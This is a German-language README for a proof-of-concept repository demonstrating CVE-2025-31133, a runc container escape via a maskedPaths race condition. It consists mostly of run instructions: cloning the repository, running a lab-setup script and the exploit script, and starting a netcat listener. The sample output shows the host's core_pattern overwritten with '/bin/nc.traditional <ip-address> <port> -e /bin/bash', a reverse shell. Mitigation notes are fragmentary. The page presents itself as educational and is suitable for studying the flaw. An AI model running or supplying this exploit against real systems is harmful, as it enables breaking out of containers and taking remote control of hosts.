
Lehrreiches Proof-of-Concept für CVE-2025-31133, einen runc-Containerausbruch durch eine maskedPaths-Race-Condition. Beinhaltet Labor-Setup, Exploit-Skript und Anleitungen zur Schadensbegrenzung für Sicherheitsforscher.
Eine Proof-of-Concept-Demonstration und Lernumgebung für CVE-2025-31133, eine Sicherheitslücke in runc, die das Umgehen des maskedPaths-Schutzes durch eine Race-Condition ermöglicht. maskedPaths dienen dazu, Container am Zugriff auf sensible Dateipfade des Host-Dateisystems zu hindern.
https://github.com/user-attachments/assets/d7b4ea43-6cab-4ac5-bb07-08bc46479910
👉 Dieses Repository ist ein praktisches Beispiel für die genauen Forschungsmethoden und -techniken, die im Black Hat Training vermittelt werden:
Der Exploit nutzt eine Race-Condition aus, bei der:
maskedPaths konfiguriert, um sensible Dateien zu schützen (z. B. /proc/sys/kernel/core_pattern)/dev/null) im Container-RootfsDieses Repository dient ausschließlich Bildungszwecken.
git clone https://github.com/C-h4ck-0/Learn-about-cve-2025-31133-poc.git
cd Learn-about-cve-2025-31133-poc
Das Skript lab-setup.sh führt Folgendes aus:
chmod +x lab-setup.sh
./lab-setup.sh
Überprüfen, ob die angreifbare runc-Version installiert ist:
runc --version
Sie sollten Version 1.2.0 oder ähnlich sehen.
nc -lnvp <PORT>
chmod +x cve-2025-31133-exploit.sh
./cve-2025-31133-exploit.sh
Bei Erfolg sollten Sie Folgendes sehen:
[*] Compiling race condition exploit binary...
[*] Starting exploit attempts...
[*] Target: /proc/sys/kernel/core_pattern
[*] Backing up /proc/sys/kernel/core_pattern...
[*] Backup created at /tmp/core_pattern.bak
[*] Current content of target:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E
====================================================
[*] Testing delay: 5 microseconds
====================================================
X..
[+] ========================================
[+] SUCCESS! Exploit succeeded.
[+] ========================================
[+] Original content:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E
------------------------------------------------
[+] Modified content:
|/bin/nc.traditional <ip-address> <port> -e /bin/bash
------------------------------------------------
./exploit.sh: line 148: 7068 Segmentation fault (core dumped) sleep 5
[*] Restoring original content...
[*] Restoration complete.
Es sollte eine Reverse-Shell-Verbindung zu Ihrem Listener hergestellt werden.
Um sich vor dieser Schwachstelle zu schützen:
core_pattern nach erfolgreichem Exploit automatisch wieder herDieses Projekt wird zu Bildungszwecken bereitgestellt. Verwenden Sie es verantwortungsbewusst und ethisch.
Denken Sie daran: Nutzen Sie Sicherheitsforschungswerkzeuge stets verantwortungsbewusst und nur in Umgebungen, die Ihnen gehören oder für die Sie eine ausdrückliche Erlaubnis zum Testen haben.